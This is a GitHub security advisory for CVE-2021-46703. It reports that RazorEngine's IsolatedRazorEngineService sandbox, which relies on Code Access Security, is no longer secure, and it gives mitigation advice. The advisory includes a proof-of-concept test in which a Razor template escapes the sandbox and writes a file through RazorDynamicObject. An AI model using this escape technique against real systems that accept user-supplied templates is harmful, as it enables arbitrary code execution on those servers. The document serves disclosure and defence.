Headline
CVE-2021-46703: Anouncement: Security with `IsolatedRazorEngineService` · Issue #585 · Antaris/RazorEngine
** UNSUPPORTED WHEN ASSIGNED ** In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
This issue is to inform everyone that IsolatedRazorEngineService
, which uses CAS internally, should not be considered ‘secure’ anymore for various reasons:
- CAS was obsoleted quite a while now
- CAS Is not supported on latest platform updates (.NET 5/6 / .Net Core)
- Microsoft will no longer provide patches for security issues
In addition to the above the following code sample was reported to me as an issue of RazorEngine itself (thanks @g2udevelopment):
static void IsolatedRazorEngineService\_BadTemplate\_InSandbox\_Escape()
{
using (var service \= IsolatedRazorEngineService.Create(SandboxCreator))
{
string file \= Path.Combine(Environment.CurrentDirectory, Path.GetRandomFileName());
string template \= @"
@using System.IO
@using RC = RazorEngine.Compilation
@{
System.Linq.Expressions.Expression<System.Action> exp = () => File.WriteAllText(""$file$"", ""BAD DATA"");
dynamic d = (RC.RazorDynamicObject)RC.RazorDynamicObject.Create(exp);
System.Action a = d.Compile();
a();
}".Replace("$file$", file.Replace("\\\\", "\\\\\\\\"));
Assert.DoesNotThrow(() \=>
{
service.RunCompile(template, "test");
});
Assert.IsTrue(File.Exists(file));
}
If you depend on IsolatedRazorEngineService
for security I’d urge you to redesign your security. If you need a fast fix, you can use the attached patch (0001-Not-so-Safe.zip) and compile RazorEngine yourself (however, you will not longer be able to use ‘dynamic’ with this patch).
Just to clarify, you are only affected by this IF:
- you currently use
IsolatedRazorEngineService
and use CAS to control the template permissions - if users can externally control the template contents
If you use RazorEngine for E-Mail generation or templating Engine (documentation generation, …) you are most likely not directly affected by this issue, even if you use IsolatedRazorEngineService
as long as you use RazorEngine 'correctly’. Correct usage means
that you don’t allow direct user input to parts of the template. This mistake can happen if you use for example by string concatenation instead of using @
Syntax-Elements. Just to remind you: If you use string concatenation to build your template with untrusted user inputs, you allow your users to execute code on your system. This is most likely not what you want with or without Isolation!